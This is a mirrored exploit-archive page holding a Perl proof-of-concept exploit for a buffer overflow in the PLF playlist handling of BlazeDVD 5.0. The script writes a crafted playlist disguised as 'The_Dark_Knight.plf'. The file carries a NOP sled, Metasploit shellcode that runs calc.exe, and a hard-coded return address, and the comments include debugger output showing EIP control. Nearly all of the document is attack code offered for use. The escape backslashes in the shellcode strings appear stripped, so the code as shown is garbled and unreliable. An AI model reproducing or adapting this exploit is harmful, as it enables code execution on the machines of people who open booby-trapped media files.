[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
# Published : 2008-08-10
# Author : LiquidWorm
# Previous Title : Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability
# Next Title : Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be
# exploited via crafted PLF playlist file localy and remotely. It fails to
# perform boundry checking of the user input file, allowing the EIP to be
# overwritten, thus, controling the next insctruction of the software. After
# succesfull exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
#
# WinDgb(output):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#
print "n|==================================================================|n";
print "| |n";
print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |n";
print "| by LiquidWorm <liquidworm [at] gmail.com> |n";
print "| |n";
print "|==================================================================|nn";
$nop = "x90" x 96;
# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "x29xc9x83xe9xddxd9xee".
"xd9x74x24xf4x5bx81x73".
"x13x7dxe6xe7x4ex83xeb".
"xfcxe2xf4x81x0exa3x4e".
"x7dxe6x6cx0bx41x6dx9b".
"x4bx05xe7x08xc5x32xfe".
"x6cx11x5dxe7x0cx07xf6".
"xd2x6cx4fx93xd7x27xd7".
"xd1x62x27x3ax7ax27x2d".
"x43x7cx24x0cxbax46xb2".
"xc3x4ax08x03x6cx11x59".
"xe7x0cx28xf6xeaxacxc5".
"x22xfaxe6xa5xf6xfax6c".
"x4fx96x6fxbbx6ax79x25".
"xd6x8ex19x6dxa7x7exf8".
"x26x9fx42xf6xa6xebxc5".
"x0dxfax4axc5x15xeex0c".
"x47xf6x66x57x4ex7dxe6".
"x6cx26x41xb9xd6xb8x1d".
"xb0x6exb6xfex26x9cx1e".
"x15x16x6dx4ax22x8ex7f".
"xb0xf7xe8xb0xb1x9ax85".
"x86x22x1exc8x82x36x18".
"xe6xe7x4e";
$ret = "x78x53xbex01";
$payload = $nop.$shellcode.$ret;
open(plf, ">./The_Dark_Knight.plf");
print plf "$payload";
print "n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!nn";
print "n...t00t w00t!nan";
# August, 2008
# www.Syue.com [2008-08-10]